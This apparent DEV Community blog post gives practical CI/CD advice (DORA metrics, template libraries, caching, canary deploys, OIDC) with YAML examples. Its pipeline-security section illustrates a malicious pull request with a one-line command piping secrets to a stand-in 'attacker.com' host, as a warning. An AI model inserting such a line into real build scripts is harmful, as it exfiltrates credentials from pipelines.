DEV Community

Cover image for Your CI/CD Pipeline is a Dumpster Fire β€” Here's the Extinguisher 🧯
S, Sanjay
S, Sanjay

Posted on

Your CI/CD Pipeline is a Dumpster Fire β€” Here's the Extinguisher 🧯

🎬 Welcome to Pipeline Therapy

Let me describe your CI/CD pipeline. Stop me when I'm wrong:

  1. It takes 42 minutes to build and deploy
  2. Nobody knows exactly what it does (the YAML is 800 lines)
  3. Each team has their own custom pipeline because "our needs are different"
  4. Flaky tests fail 20% of the time, and everyone just re-runs the pipeline
  5. There's a manual approval step where someone clicks "Approve" without looking
  6. Someone set it up 3 years ago and that person doesn't work here anymore

Was I close? 😏

Let's fix all of this.


πŸ“Š DORA Metrics: How to Know If You're Actually Good

Before fixing anything, you need to measure where you stand. Google's DORA research (14,000+ teams studied) identified 4 key metrics that predict software delivery performance:

 Metric                    β”‚ Elite          β”‚ "We Need Help"
 ─────────────────────────┼────────────────┼──────────────────
 Deployment Frequency      β”‚ Multiple/day   β”‚ Monthly or less
 Lead Time for Changes     β”‚ < 1 hour       β”‚ > 1 month
 Change Failure Rate       β”‚ 0-15%          β”‚ > 45%
 Mean Time to Recovery     β”‚ < 1 hour       β”‚ > 6 months
Enter fullscreen mode Exit fullscreen mode

Here's the Uncomfortable Truth

If your team deploys once a week, your lead time is 3 days, and your change failure rate is 30% β€” you are statistically average. Not bad, but not good either.

Elite teams deploy hundreds of times per day with less than 15% failure rate. They're not smarter β€” they have better pipelines, smaller changes, and more automation.

How to Track DORA Now

# GitHub Actions: Track deployment frequency
- name: Record deployment
  run: |
    curl -X POST "${{ secrets.METRICS_ENDPOINT }}" \
      -H "Content-Type: application/json" \
      -d '{
        "event": "deployment",
        "service": "${{ github.repository }}",
        "environment": "production",
        "sha": "${{ github.sha }}",
        "timestamp": "'$(date -u +%Y-%m-%dT%H:%M:%SZ)'"
      }'
Enter fullscreen mode Exit fullscreen mode

Or use tools like Sleuth, LinearB, or GitHub's built-in DORA metrics (available in GitHub Insights for Enterprise).


πŸ—οΈ Pipeline Architecture: The Template Library Pattern

The Anti-Pattern: Every Team Reinvents the Wheel

Team Alpha: 800-line custom YAML β†’ Azure DevOps
Team Bravo: 600-line custom YAML β†’ Azure DevOps (different structure)
Team Charlie: "We just deploy from our laptops" β†’ 😱

Result:
  β€’ 3 different security scanning approaches
  β€’ 2 teams forgot to add container image scanning
  β€’ 1 team has no tests in their pipeline
  β€’ Nobody can help debug another team's pipeline
Enter fullscreen mode Exit fullscreen mode

The Solution: Shared Template Library

β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚         Shared Template Library (v2.5.0)         β”‚
β”‚                                                  β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”  β”‚
β”‚  β”‚  Build     β”‚ β”‚  Test     β”‚ β”‚  Security     β”‚  β”‚
β”‚  β”‚  Template  β”‚ β”‚  Template β”‚ β”‚  Scan         β”‚  β”‚
β”‚  β”‚  (.NET,    β”‚ β”‚  (unit,   β”‚ β”‚  Template     β”‚  β”‚
β”‚  β”‚   Node,    β”‚ β”‚  integ,   β”‚ β”‚  (Trivy,      β”‚  β”‚
β”‚  β”‚   Python)  β”‚ β”‚  e2e)     β”‚ β”‚   Checkov)    β”‚  β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜  β”‚
β”‚  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”  β”‚
β”‚  β”‚  Deploy    β”‚ β”‚  Notify   β”‚ β”‚  Rollback     β”‚  β”‚
β”‚  β”‚  Template  β”‚ β”‚  Template β”‚ β”‚  Template     β”‚  β”‚
β”‚  β”‚  (K8s,     β”‚ β”‚  (Slack,  β”‚ β”‚  (auto/       β”‚  β”‚
β”‚  β”‚   AppSvc)  β”‚ β”‚   Teams)  β”‚ β”‚   manual)     β”‚  β”‚
β”‚  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜  β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
         β”‚ consumed by
         β–Ό
β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
β”‚  Team pipelines (10-20 lines each!)             β”‚
β”‚  "Use build template, test template, deploy     β”‚
β”‚   template β€” just tell it your service name"    β”‚
β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
Enter fullscreen mode Exit fullscreen mode

Azure DevOps: Template Library in Action

# Team's pipeline: SHORT and STANDARD
trigger:
  branches:
    include: [main]

resources:
  repositories:
    - repository: templates
      type: git
      name: platform/pipeline-templates
      ref: refs/tags/v2.5.0    # πŸ”‘ Always pin the version!

stages:
  - template: stages/ci.yml@templates
    parameters:
      language: dotnet
      dotnetVersion: '8.0'
      testProjects: '**/*Tests.csproj'

  - template: stages/security-scan.yml@templates
    parameters:
      trivySeverity: 'CRITICAL,HIGH'

  - template: stages/deploy-k8s.yml@templates
    parameters:
      environment: staging
      aksCluster: aks-staging-eastus
      namespace: payments

  - template: stages/deploy-k8s.yml@templates
    parameters:
      environment: production
      aksCluster: aks-prod-eastus
      namespace: payments
      requireApproval: true
Enter fullscreen mode Exit fullscreen mode

GitHub Actions: Reusable Workflows

# .github/workflows/deploy.yml β€” Team's workflow
name: Deploy
on:
  push:
    branches: [main]

jobs:
  build-and-test:
    uses: myorg/shared-workflows/.github/workflows/build-dotnet.yml@v2.5.0
    with:
      dotnet-version: '8.0'
      project-path: 'src/PaymentService'

  security-scan:
    needs: build-and-test
    uses: myorg/shared-workflows/.github/workflows/security-scan.yml@v2.5.0
    with:
      image: ${{ needs.build-and-test.outputs.image }}

  deploy:
    needs: [build-and-test, security-scan]
    uses: myorg/shared-workflows/.github/workflows/deploy-k8s.yml@v2.5.0
    with:
      environment: production
      image: ${{ needs.build-and-test.outputs.image }}
    secrets: inherit
Enter fullscreen mode Exit fullscreen mode

⚑ Pipeline Performance: From 45 Minutes to 5

Where's the Time Going?

In my experience auditing pipelines, here's where time hides:

Typical 45-minute pipeline breakdown:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  7 min  β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚        Agent startup + checkout
 12 min  β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚  Dependency install (npm/nuget)
  5 min  β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚         Build
  8 min  β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚      Tests (running ALL tests sequentially)
  3 min  β”‚β–ˆβ–ˆβ–ˆβ”‚           Docker build (no layer caching)
  5 min  β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚         Security scanning
  5 min  β”‚β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ”‚         Deploy + smoke tests
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
 45 min total  πŸ’€

Optimized 5-minute pipeline:
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  0.5 min β”‚β–ˆβ”‚            Cached checkout
  0.5 min β”‚β–ˆβ”‚            Cached dependencies
  1 min   β”‚β–ˆβ–ˆβ”‚           Incremental build
  1 min   β”‚β–ˆβ–ˆβ”‚           Parallel tests (affected only)
  0.5 min β”‚β–ˆβ”‚            Docker build (cached layers)
  1 min   β”‚β–ˆβ–ˆβ”‚           Parallel: scan + deploy
  0.5 min β”‚β–ˆβ”‚            Smoke test
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
  5 min total  πŸš€
Enter fullscreen mode Exit fullscreen mode

The Optimization Playbook

1. Cache Everything

# GitHub Actions: Cache node_modules
- uses: actions/cache@v4
  with:
    path: ~/.npm
    key: npm-${{ hashFiles('**/package-lock.json') }}
    restore-keys: npm-

# Azure DevOps: Cache NuGet packages
- task: Cache@2
  inputs:
    key: 'nuget | "$(Agent.OS)" | **/packages.lock.json'
    restoreKeys: 'nuget | "$(Agent.OS)"'
    path: $(NUGET_PACKAGES)
Enter fullscreen mode Exit fullscreen mode

2. Docker Layer Caching

# BAD: Copying everything first breaks the cache
COPY . .
RUN npm install

# GOOD: Copy package files first, install, THEN copy code
COPY package.json package-lock.json ./
RUN npm ci --production
COPY . .
# Now code changes don't re-trigger npm install
Enter fullscreen mode Exit fullscreen mode

3. Run Tests in Parallel

# GitHub Actions: Matrix strategy
jobs:
  test:
    strategy:
      matrix:
        shard: [1, 2, 3, 4]
    steps:
      - run: npm test -- --shard=${{ matrix.shard }}/4
Enter fullscreen mode Exit fullscreen mode

4. Only Test What Changed

# For monorepos: detect which service changed
- uses: dorny/paths-filter@v3
  id: changes
  with:
    filters: |
      payments:
        - 'services/payments/**'
      users:
        - 'services/users/**'

- name: Test payments
  if: steps.changes.outputs.payments == 'true'
  run: cd services/payments && npm test
Enter fullscreen mode Exit fullscreen mode

🚨 Real-World Disaster #1: The Self-Hosted Runner That Poisoned Everything

The Error:

ERROR: npm ERR! ENOSPC: no space left on device
Enter fullscreen mode Exit fullscreen mode

What Happened: Self-hosted build agents accumulated Docker images, node_modules caches, and build artifacts over months. Disk filled up. Builds started failing randomly across all teams.

Worse: One build left behind a corrupted node_modules folder. The next build on the same agent used the cached corruption and deployed a broken application.

The Fix:

  • Use ephemeral agents (fresh VM/container per build) β€” Azure DevOps Scale Set agents or GitHub Actions hosted runners
  • If self-hosted, add a cleanup job:
- name: Agent cleanup
  condition: always()
  run: |
    docker system prune -af --volumes
    rm -rf /tmp/build-*
Enter fullscreen mode Exit fullscreen mode

🚒 Deployment Strategies: How to Ship Without Sinking

The Deployment Strategy Menu

Strategy           β”‚ Risk  β”‚ Speed β”‚ Rollback β”‚ Best For
───────────────────┼───────┼───────┼──────────┼──────────────────
Rolling Update     β”‚ Med   β”‚ Fast  β”‚ Slow     β”‚ Default K8s strategy
Blue-Green         β”‚ Low   β”‚ Fast  β”‚ Instant  β”‚ Stateless services
Canary             β”‚ Low   β”‚ Slow  β”‚ Fast     β”‚ High-risk changes
Feature Flags      β”‚ Lowestβ”‚ Inst. β”‚ Instant  β”‚ Business logic changes
Enter fullscreen mode Exit fullscreen mode

Canary Deployment: The Smart Way to Ship

Step 1: Deploy new version to 5% of traffic
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚  95% traffic β†’ v1.0 (3 pods)   β”‚
  β”‚   5% traffic β†’ v2.0 (1 pod)    β”‚   ← Watch error rates, latency
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Step 2: If metrics look good, increase to 25%
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚  75% traffic β†’ v1.0 (3 pods)   β”‚
  β”‚  25% traffic β†’ v2.0 (1 pod)    β”‚   ← Still watching...
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Step 3: If still good, go to 100%
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ 100% traffic β†’ v2.0 (3 pods)   β”‚   ← πŸŽ‰ Full rollout
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Step ABORT: If any stage looks bad
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ 100% traffic β†’ v1.0 (3 pods)   β”‚   ← 😌 Safely rolled back
  β”‚   0% traffic β†’ v2.0 (removed)  β”‚
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
Enter fullscreen mode Exit fullscreen mode

🚨 Real-World Disaster #2: The Friday 5 PM Deployment

What Happened: Team deploys at 5:07 PM on Friday (bad idea, but deadlines). Rolling update replaces all 3 pods. New version has a memory leak that manifests after 4 hours. At 9 PM, pods start OOMKilling. Nobody's monitoring. By Saturday morning, the payment service has been down for 12 hours.

If they had used canary: The 5% canary pod would have shown increasing memory usage within 2 hours. Automated rollback triggers at 7 PM. 95% of users never noticed. Team enjoys their weekend.

The Golden Rules:

  1. Never deploy on Friday (unless you have canary + automated rollback)
  2. Never deploy during peak hours (find your low-traffic window)
  3. Always have automated rollback based on error rates and latency
  4. Small changes, frequent deploys > big changes, occasional deploys

πŸ” Pipeline Security: Your Pipeline is an Attack Vector

Your CI/CD pipeline has more access than most developers:

  • It can push code to production
  • It has access to secrets and credentials
  • It can modify infrastructure
  • It downloads code from the internet (dependencies)

Things That Should Scare You

Scary Thing #1: Secrets in pipeline logs
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ Step: Deploy                                β”‚
  β”‚ $ echo $DATABASE_CONNECTION_STRING           β”‚
  β”‚ Server=prod.db.windows.net;Password=Pa$$w0rdβ”‚  ← 🫠
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Scary Thing #2: Pull request pipelines run arbitrary code
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ External contributor opens PR                β”‚
  β”‚ PR changes build script to:                 β”‚
  β”‚   echo $SECRETS | curl attacker.com         β”‚
  β”‚ Pipeline runs automatically...              β”‚  ← 😱
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜

Scary Thing #3: Dependency confusion attacks
  β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
  β”‚ Internal package: @mycompany/utils          β”‚
  β”‚ Attacker publishes: @mycompany/utils on npm β”‚
  β”‚ Pipeline installs public one first...       β”‚  ← 🦠
  β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
Enter fullscreen mode Exit fullscreen mode

Pipeline Security Checklist

Authentication:
  βœ… OIDC federation (no long-lived secrets in pipelines)
  βœ… Managed Identity for Azure resources
  βœ… Short-lived tokens (expire in minutes, not months)

Authorization:
  βœ… Pipeline can only deploy to its own service
  βœ… Production deploys require approved PR + passing checks
  βœ… Environment protection rules with required reviewers

Dependencies:
  βœ… Lock files committed (package-lock.json, go.sum)
  βœ… Dependency scanning (Dependabot, Snyk)
  βœ… Private package registry for internal packages

Secrets:
  βœ… Never echo/print secrets in logs
  βœ… Use secret masking in pipeline variables
  βœ… Rotate secrets automatically
  βœ… Audit who accesses what secret
Enter fullscreen mode Exit fullscreen mode

🚨 Real-World Disaster #3: The Secret That Wasn't Secret

What Happened: A developer added a debug step to a pipeline:

- name: Debug connection
  run: |
    echo "Connecting to: ${{ secrets.DB_CONNECTION_STRING }}"
Enter fullscreen mode Exit fullscreen mode

GitHub/Azure DevOps masks secrets in logs... usually. But this string was partially masked because it contained special characters that broke the masking regex. The full production database password appeared in the build log. The build log was accessible to 200 developers.

The Fix:

  1. Remove all echo/print statements that reference secrets
  2. Use OIDC federation so there are no secrets to leak:
# GitHub Actions: OIDC to Azure (no secrets!)
permissions:
  id-token: write
  contents: read

steps:
  - uses: azure/login@v2
    with:
      client-id: ${{ vars.AZURE_CLIENT_ID }}      # Not a secret!
      tenant-id: ${{ vars.AZURE_TENANT_ID }}
      subscription-id: ${{ vars.AZURE_SUBSCRIPTION_ID }}
Enter fullscreen mode Exit fullscreen mode

πŸ“ Multi-Team Governance: Herding Cats With Guardrails

At the Principal level, you're not just building pipelines β€” you're building the pipeline platform that 10+ teams use. Here's how to standardize without becoming a bottleneck:

Platform Team Provides:                 App Teams Customize:
════════════════════════                ════════════════════
βœ… Template library                     βœ… Service name & config
βœ… Security scanning                    βœ… Test commands
βœ… Deployment strategies                βœ… Environment-specific vars
βœ… Secret management pattern            βœ… Notification channels
βœ… DORA metrics collection              βœ… Deployment schedule
βœ… Compliance guardrails                βœ… Custom test stages
Enter fullscreen mode Exit fullscreen mode

The Inner Source Model

Template repo: platform/pipeline-templates
β”œβ”€β”€ Maintained by platform team
β”œβ”€β”€ Versioned with semantic versioning (v2.5.0)
β”œβ”€β”€ Teams consume via git tags (immutable reference)
β”œβ”€β”€ Breaking changes = major version bump
β”œβ”€β”€ Teams can contribute improvements via PR
└── Monthly "template office hours" for questions
Enter fullscreen mode Exit fullscreen mode

🎯 Key Takeaways

  1. Measure DORA metrics β€” you can't improve what you don't measure
  2. Template libraries standardize quality without removing team autonomy
  3. Cache everything to cut build times by 80%+
  4. Canary deployments are the safest way to ship to production
  5. OIDC federation eliminates the #1 pipeline security risk (leaked secrets)
  6. Never deploy on Friday. Just don't. πŸ™…

πŸ”₯ Homework

  1. Time your pipeline end-to-end. Write down the duration of each step. Find the biggest bottleneck.
  2. Check if your pipeline uses long-lived secrets. Replace one with OIDC federation.
  3. Add caching for dependencies if you haven't already β€” measure the before/after build time.

Next up in the series: **Your App is on Fire and You Don't Even Know: Observability for Humans* β€” where we decode metrics, logs, traces, and why alert fatigue is slowly killing your team.*


πŸ’¬ What's the longest CI/CD pipeline you've ever suffered through? I once saw a 3-hour Java build. Yes, three hours. Share your pain below. πŸ•

Top comments (0)